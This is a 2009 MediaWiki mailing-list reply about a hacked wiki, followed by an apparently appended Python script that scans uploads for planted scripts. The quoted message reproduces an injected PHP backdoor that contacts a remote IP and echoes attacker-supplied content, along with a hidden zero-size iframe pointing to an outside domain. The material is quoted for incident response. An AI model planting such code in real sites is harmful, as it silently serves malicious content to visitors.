[Mediawiki-l] HTML:Iframe-inf virus?

Platonides Platonides at gmail.com
Mon Jun 22 23:12:18 UTC 2009


Tim Ware wrote:
> I notice several files that seem to have been modified at the docroot level:
> 
> foter.php (never noticed this one before) with this content:
> 
> <?php
> $ip = '209.62.27.83';
> $port = '80';
> $path = '/linkr/get/';
> $fp = fsockopen($ip, $port, $errno, $errstr, 30);
> if (!$fp) {
> 	echo '';
> } else {
> 	$post = "u=".rawurlencode($_SERVER['HTTP_USER_AGENT'])."&h=".rawurlencode($_SERVER['SERVER_NAME']);
> 	$out = "POST ".$path." HTTP/1.0\r\n";
> 	$out .= "Host: ".$ip.":".$port."\r\n";
> 	$out .= "Content-Type: text/html\r\n";
> 	$out .= "Content-Length: ".strlen($post)."\r\n";
> 	$out .= "Connection: Close\r\n";
> 	$out .= "\r\n";
> 	$out .= $post;
> 	fwrite($fp, $out);
> 	$resp = '';
> 	while (!feof($fp)) {
> 		$resp .= fgets($fp, 128);
> 	}
> 	fclose($fp);
> 	$paths = split("\r\n\r\n", $resp);
> 	echo $paths[1];
> }
> ?>
> 
> 
> 
> and this "m-analytics" code was added to an old index page and a  
> google verification page:
> 
> 
> <iframe src="http://m-analytics.net/qaqa/?daf02d89f0bb66c3b4a9ff31da01e10a" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
> 
> Same thing happened to another wiki on this site, where the
> m-analytics iframe was added. I *did not* add this, so I suspect foul
> play.
> 
> Thoughts?
> 
> Tim

Back up everything and start from scratch.
The only files from the wiki you should need to keep are the uploads.
Remember to verify there aren't scripts there.
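
One way to carry out the "verify there aren't scripts there" step on a saved uploads directory, as an added example that is not part of the original thread or of MediaWiki. The extension list, the reason strings and the sample tree built in demo() are assumptions made for illustration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a web server may hand to an interpreter (assumed list, adjust to your setup).
SCRIPT_EXTS = {".php", ".php3", ".php5", ".phtml", ".phar", ".pl", ".cgi", ".py", ".sh"}
CONFIG_NAMES = {".htaccess", ".user.ini"}  # files that change how a directory is served
PHP_TAG = re.compile(rb"<\?php", re.I)
# Zero-size iframe like the one quoted in the thread.
HIDDEN_IFRAME = re.compile(rb"<iframe[^>]*\b(?:width|height)\s*=\s*[\"']?0\b", re.I)

def scan_uploads(root):
    """Return sorted (relative_path, reason) pairs for files that need manual review."""
    findings = []
    for path in (p for p in Path(root).rglob("*") if p.is_file()):
        rel = path.relative_to(root).as_posix()
        lower = path.name.lower()
        # Check every dot-separated part so "shell.php.jpg" is caught too.
        parts = {"." + p for p in lower.split(".")[1:]}
        if lower in CONFIG_NAMES:
            findings.append((rel, "server config override"))
        elif parts & SCRIPT_EXTS:
            findings.append((rel, "script extension"))
        try:
            data = path.read_bytes()
        except OSError:
            findings.append((rel, "unreadable"))
            continue
        if PHP_TAG.search(data):
            findings.append((rel, "PHP open tag in content"))
        if HIDDEN_IFRAME.search(data):
            findings.append((rel, "zero-size iframe"))
    return sorted(findings)

def demo():
    """Scan a constructed uploads tree (sample data, not from the thread)."""
    samples = {
        "a/photo.jpg": b"\xff\xd8\xff\xe0JFIF" + b"\x00" * 16,
        "a/logo.png": b"\x89PNG\r\n<?php echo 1; ?>",
        "b/foter.php": b"<?php echo ''; ?>",
        "b/index.html": b'<iframe src="http://example.invalid/" width=0 height=0></iframe>',
        "b/.htaccess": b"AddType application/x-httpd-php .jpg\n",
    }
    with tempfile.TemporaryDirectory() as root:
        for rel, body in samples.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_bytes(body)
        return scan_uploads(root)
```

Run scan_uploads() against the backup copy rather than the live docroot, and treat every finding as a file to inspect by hand before it goes back onto the rebuilt server.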



